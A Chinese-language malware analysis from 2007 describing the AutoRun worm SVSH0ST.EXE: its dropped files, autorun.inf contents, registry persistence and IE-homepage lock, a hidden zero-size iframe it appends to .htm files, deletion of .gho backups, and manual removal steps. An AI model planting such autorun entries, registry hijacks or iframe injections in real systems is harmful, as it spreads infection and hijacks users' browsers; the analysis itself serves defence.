Virus.Win32.AutoRun.cp(SVSH0ST.EXE)病毒的分析解决
电脑软硬件应用网 45IT.COM 时间:2007-06-22 08:47 作者:mopery
文件名称: SVSH0ST.EXE 文件大小: 25600 字节 MD5: 8FD4BC06C4CB4EF5963696A5E404EE32 加壳: UPX 编写语言: Delphi 病毒名: KAV: Virus.Win32.AutoRun.cp
详细资料:
文件变化: 释放文件 %System%\SVSH0ST.EXE %System%\dpserio1.dll %System%\autorun.inf
各分区根目录释放 X:\autorun.inf X:\lcg.exe
autorun.inf 内容
[AutoRun]
open=lcg.exe shell\open=打开(&O) shell\open\Command=lcg.exe shell\open\Default=1 shell\explore=资源管理器(&X) shell\explore\Command=lcg.EXE | 修改注册表: 病毒创建启动项
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "svchost"="%System%\SVSH0ST.EXE" | 修改默认IE主页为劫持的主页地址(由生成器指定)
添加项禁止修改主页
[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel] "HomePage"=dword:00000001 | 其他行为: 修改 .htm 网页文件,在尾部添加(由生成器指定)
<IfrAmE src=http://www.XXXX.com/test.htm width=0 height=0></IfrAmE> | 删除后辍为 .gho 的文件
访问 http://ll80.com/xx/xx.HTM 进行统计
注: %system%代表Windows操作系统的系统文件夹路径,并非正式的系统环境变量。 对于操作系统版本为Windows XP,装在默认路径的系统,%system%指C:\WINDOWS\system32文件夹
清除方法: 1. 结束进程(步骤:ctrl+alt+del调用任务管理器) %System%\SVSH0ST.EXE
2.删除文件(如无法直接删除,可到down.45it.com下载费尔木马强制删除器工具.zip进行强制删除) %System%\SVSH0ST.EXE %System%\dpserio1.dll %System%\autorun.inf X:\autorun.inf X:\lcg.exe
3.删除病毒启动项与禁止修改IE主页项(注册表打开方式:开始菜单-运行-输入“regedit”)
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "svchost"="%System%\SVSH0ST.EXE"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel] "HomePage"= | 4. 修改IE主页(直接打开IE修改).
5.修复被修改的网页文件 备注: 此病毒为生成器所生成,在我们的博客上已经有相应报道 此生成器目前还有诸多bug
|
------分隔线----------------------------
无法在这个位置找到: baidushare.htm